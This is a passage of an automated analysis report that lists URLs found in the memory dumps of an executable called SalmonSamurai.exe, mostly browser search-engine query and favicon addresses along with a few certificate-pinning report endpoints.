Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://clients3.google.com/cert_upload_json
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://crbug.com/1138528
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-hpkp-report-only
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-hpkp-report-only#
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://dts.search-results.com/sr?lng=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://find.in.gr/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.pnghttp://find.in.gr/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://g1.delphi.lv/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://g1.delphi.lv/favicon.icohttp://www.delfi.lv/search_all/?ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://i.rl0.ru/2011/icons/rambler.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://i.rl0.ru/2011/icons/rambler.icohttp://nova.rambler.ru/search?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://i.wp.pl/a/i/stg/500/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://i.wp.pl/a/i/stg/500/favicon.icohttp://szukaj.wp.pl/szukaj.html?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://imgs.sapo.pt/images/sapo.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://imgs.sapo.pt/images/sapo.icohttp://pesquisa.sapo.pt/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://l.twimg.com/i/hpkp_report
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://l.twimg.com/i/hpkp_report0
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://linkurystoragenorthus.blob.core.windows.net/static/favicon.icohttp://search.snapdo.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.icohttp://arianna.libero.it/search/ab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/?s=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nova.rambler.ru/search?query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://nova.rambler.ru/suggest?v=3&query=
Source: SalmonSamurai.exe, 00000000.00000000.1783637639.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ok.hu/katalogus?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://pesquisa.sapo.pt/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://pesquisa.sapo.pt/livesapo?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://radce.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://report-example.test/test
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/favicon.icohttp://search.avg.com/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.avg.com/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/favicon.icohttp://search.babylon.com/home?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.babylon.com/home?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/favicon.icohttp://search.imesh.net/music?hl=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.imesh.net/music?hl=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.iminent.com/Shared/Images/favicon_gl.icohttp://search.iminent.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/favicon.icohttp://search.incredibar.com/search.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.incredibar.com/search.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.snapdo.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.softonic.com/img/favicon.icohttp://search.softonic.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/favicon.icohttp://search.sweetim.com/search.asp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.sweetim.com/search.asp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/?ru=1&query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.tut.by/favicon.icohttp://search.tut.by/?ru=1&query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://search.walla.co.il/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/favicon.icohttp://searchfunmoods.com/results.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://searchfunmoods.com/results.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/favicon.icohttp://start.sweetpacks.com/search.asp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://start.sweetpacks.com/search.asp?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?p
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://szukaj.wp.pl/szukaj.html?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.conduit.com/favicon.icohttp://www.conduit.com/search?q=
